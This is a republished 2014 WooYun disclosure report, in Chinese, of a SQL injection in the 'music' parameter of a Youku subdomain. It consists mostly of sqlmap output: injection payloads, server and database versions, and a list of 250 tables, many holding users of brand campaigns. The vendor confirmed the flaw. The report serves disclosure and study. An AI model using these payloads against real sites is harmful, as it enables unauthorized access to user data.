优酷分站SQL注入

admin
admin
admin
139803
文章
114
评论
2015年8月13日06:34:55评论380 views字数 188阅读0分37秒阅读模式
摘要

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

漏洞概要 关注数(12) 关注此漏洞

缺陷编号: WooYun-2014-83661

漏洞标题: 优酷分站SQL注入

相关厂商: 优酷

漏洞作者: U神

提交时间: 2014-11-17 22:29

公开时间: 2015-01-01 22:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏

漏洞详情

披露状态:

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

简要描述:

详细说明:

code 区域 
http://hvsop.youku.com/list.php?music=1

优酷分站SQL注入

code 区域 
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
 sts:
 ---
 Place: GET
 Parameter: music
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: music=1' AND 7821=7821 AND 'IbzW'='IbzW
 
     Type: UNION query
     Title: MySQL UNION query (NULL) - 15 columns
     Payload: music=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,C
 ONCAT(0x7178686571,0x496c4e6172726d6c4b7a,0x7166706a71),NULL,NULL,NULL,NULL,NULL
 ,NULL#
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: music=1' AND SLEEP(5) AND 'fKmP'='fKmP
 ---
 [22:00:42] [INFO] the back-end DBMS is MySQL
 web application technology: Apache, PHP 5.3.10
 back-end DBMS: MySQL 5.0.11
 [22:00:42] [INFO] fetching database names
 available databases [3]:
 [*] db_events
 [*] information_schema
 [*] test
 
 [22:00:42] [INFO] fetched data logged to text files under 'C:/Python27/sqlmap/ou
 tput/hvsop.youku.com'

漏洞证明:

code 区域 
Database: db_events
 [250 tables]
 +--------------------------+
 | 7up_user                 |
 | adidas_2010_football     |
 | adidas_2011_tvc_info     |
 | adidas_comments          |
 | aveo_clicks              |
 | aveo_comments            |
 | aveo_users               |
 | background_users         |
 | bosideng_1024_users      |
 | bosideng_code            |
 | bosideng_fake_users      |
 | bosideng_photos          |
 | bosideng_users           |
 | bosideng_video_vote_logs |
 | bosideng_videos          |
 | bosideng_vote_logs       |
 | bsd_kpi_email            |
 | bsd_kpi_user             |
 | bsd_rt_log               |
 | bsd_user                 |
 | bugles_videos            |
 | casesharing_2013         |
 | cgirl2014_awards         |
 | cgirl_images             |
 | cgirl_users              |
 | cgirl_videos             |
 | chengxin_news            |
 | chery_comments           |
 | chery_photo_vote_logs    |
 | chery_photos             |
 | chery_users              |
 | chery_video_vote_logs    |
 | chery_videos             |
 | cityshow_comment         |
 | cityshow_data            |
 | cityshow_member          |
 | clear_game_log           |
 | clear_log                |
 | clear_rt_log             |
 | clear_users              |
 | crowneplaza_register     |
 | cruze_images             |
 | cruze_users              |
 | cruze_videos             |
 | deyi_tickets_users       |
 | dove2014_erweima         |
 | dove2014_videos          |
 | dove_user                |
 | dove_video               |
 | dumex_videos             |
 | etam_comment             |
 | etam_txt                 |
 | fiesta_2011_guestbook    |
 | fm_dream                 |
 | fm_kpi_member            |
 | fm_number                |
 | fm_number_bak            |
 | fm_number_t              |
 | fm_number_test           |
 | fm_support_log           |
 | fm_user                  |
 | fm_vote_log              |
 | fm_work                  |
 | ford_users               |
 | global_accounts          |
 | global_china             |
 | global_files             |
 | global_minisites         |
 | global_testing           |
 | global_units             |
 | greetingcard_params      |
 | gucci_comments           |
 | gucci_rt_logs            |
 | gucci_users              |
 | hkdl_users               |
 | ht_config                |
 | ht_guest                 |
 | ht_user                  |
 | htc_config               |
 | hvsop2013_awards         |
 | hvsop2014_20             |
 | hvsop2014_users          |
 | hvsop_comments           |
 | hvsop_live_email         |
 | hvsop_resumes            |
 | hvsop_users              |
 | hvsop_videos             |
 | hvsop_vote_logs          |
 | icedew_videos            |
 | jasmine_comments         |
 | jw2ask_marked            |
 | jw2ask_plans             |
 | jw2ask_questions         |
 | jw2ask_same_q            |
 | jw2ask_top30_grade_logs  |
 | kohler_comments          |
 | kohler_mm_awards         |
 | kohler_photo_vote_logs   |
 | kohler_photos            |
 | kohler_prize_logs        |
 | kohler_users             |
 | kohler_video_vote_logs   |
 | kohler_videos            |
 | lancome_datas            |
 | lancome_infos            |
 | lancome_users            |
 | lee_moment_photos        |
 | lee_moment_votelog       |
 | levis_data               |
 | levis_logs               |
 | levis_win                |
 | loreal_flash_ad          |
 | mabelline_users          |
 | mamonde_2013_videos      |
 | market_huanzhu_votes     |
 | marketing_apply_info     |
 | marketing_darenxiu       |
 | marketing_fashion        |
 | marketing_jianjiancao    |
 | marketing_kfc_avatar     |
 | marketing_kfc_cms        |
 | marketing_laifushi       |
 | marketing_upload_info    |
 | mmd_datas                |
 | mql_award                |
 | mql_seckill              |
 | mql_seckill_bak          |
 | mql_seckill_log          |
 | nfsq_users               |
 | nikegz_comments          |
 | nikegz_image             |
 | nikegz_pks               |
 | nikegz_videos            |
 | nivea_answer_logs        |
 | nivea_awards             |
 | nivea_final_awards       |
 | nivea_photos             |
 | nivea_question           |
 | nivea_users              |
 | nivea_vote_logs          |
 | onstar_regist            |
 | onstar_video             |
 | oreo_images              |
 | oreo_videos              |
 | pepsi_comments           |
 | pepsi_ecards             |
 | pepsi_media              |
 | pepsi_users              |
 | pepsi_videos             |
 | pepsi_vote_logs          |
 | pepsicny_videos          |
 | qingyang_comment         |
 | qingyang_videos          |
 | remyvsop_banner          |
 | remyvsop_comment         |
 | remyvsop_mobile          |
 | remyvsop_news            |
 | remyvsop_register        |
 | remyvsop_teams           |
 | remyvsop_videos          |
 | ricola_pincode           |
 | ricola_tickets           |
 | roewe_comment            |
 | roewe_config             |
 | roewe_guess              |
 | roewe_player             |
 | roewe_user               |
 | scj_users                |
 | sprite_users             |
 | sprite_videos            |
 | superb_comments          |
 | superb_comments_bak      |
 | superb_videos            |
 | sww_2011_users           |
 | sww_2011_videos          |
 | unit_cachedata           |
 | unit_comments            |
 | unit_misc                |
 | unit_news                |
 | unit_users               |
 | unit_videos              |
 | unit_visitors            |
 | unit_voting              |
 | vichy2013_awards         |
 | vichy2013_winners        |
 | vsop_email               |
 | vsop_live_mobile         |
 | vsop_loop_videos         |
 | vsop_lyp                 |
 | vsop_users               |
 | vsop_videos              |
 | vsop_vote_email          |
 | wtcc_2011_guestbook      |
 | wtcc_2011_shots          |
 | wtcc_2011_users          |
 | wzmt_awards              |
 | wzmt_awards_bak          |
 | wzmt_seckill             |
 | wzmt_seckill_log         |
 | z_acer_user              |
 | z_bwnzb_user             |
 | z_eleven_user            |
 | z_fanta                  |
 | z_fanta_email            |
 | z_ferrari                |
 | z_ferrero_user           |
 | z_huggies                |
 | z_huggies_comments       |
 | z_k3                     |
 | z_k3_user                |
 | z_k3_v                   |
 | z_lenscrafter_pic        |
 | z_lenscrafter_user       |
 | z_loreal                 |
 | z_market_disney          |
 | z_market_topchef         |
 | z_proya2011_100          |
 | z_proya2011_code         |
 | z_proya2011_mblog        |
 | z_proya2011_pic          |
 | z_proya2011_user         |
 | z_proya2011_v2_pic       |
 | z_proya2011_v2_user      |
 | z_proya_pic              |
 | z_proya_user             |
 | z_remyclub_comment       |
 | z_remyclub_user          |
 | z_riich_user             |
 | z_sdeer_user             |
 | z_sepb_user              |
 | z_sgm15th                |
 | z_volvo                  |
 | z_wp_code                |
 | z_young                  |
 | z_z_comment              |
 | z_z_contact              |
 | z_z_contact2             |
 | z_z_email                |
 | z_z_img                  |
 | z_z_luck                 |
 | z_z_module_luck          |
 | z_z_p                    |
 | z_z_txt                  |
 | z_z_txt_vote             |
 | z_z_v                    |
 | z_z_vote                 |
 | z_z_vote_id              |
 | z_z_vote_ip              |
 | zhijue_users             |
 | zqbb_videos              |
 +--------------------------+

修复方案:

我就跑到表,不深入了,修复吧,谢谢~好几天没rank了能来点不?

版权声明:转载请注明来源 U神@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-11-18 08:46

厂商回复:

多谢提醒,马上修复。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-11-18 02:05 | ki11y0u ( 普通白帽子 | Rank:140 漏洞数:19 | 好好学习,求带飞 ~~~~~~~~~~~~~~~~~~~~~~...)

    1

    前排~~~

  2. 2014-11-18 08:52 | backtrack丶yao ( 普通白帽子 | Rank:298 漏洞数:38 )

    2

    此号被社 by:U神

  3. 2014-11-19 09:56 | Aepl│恋爱 ( 实习白帽子 | Rank:45 漏洞数:15 | Forzen恋爱-不要做你的Guest 只想做的你adm...)

    2

    你关注的白帽子 U神 发表了漏洞 宜信某重要分站命令执行(可内网渗透) 2014-11-18 你关注的白帽子 U神 发表了漏洞 优酷分站SQL注入 2014-11-17 你关注的白帽子 U神 发表了漏洞 东方航空分站命令执行 2014-11-17

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin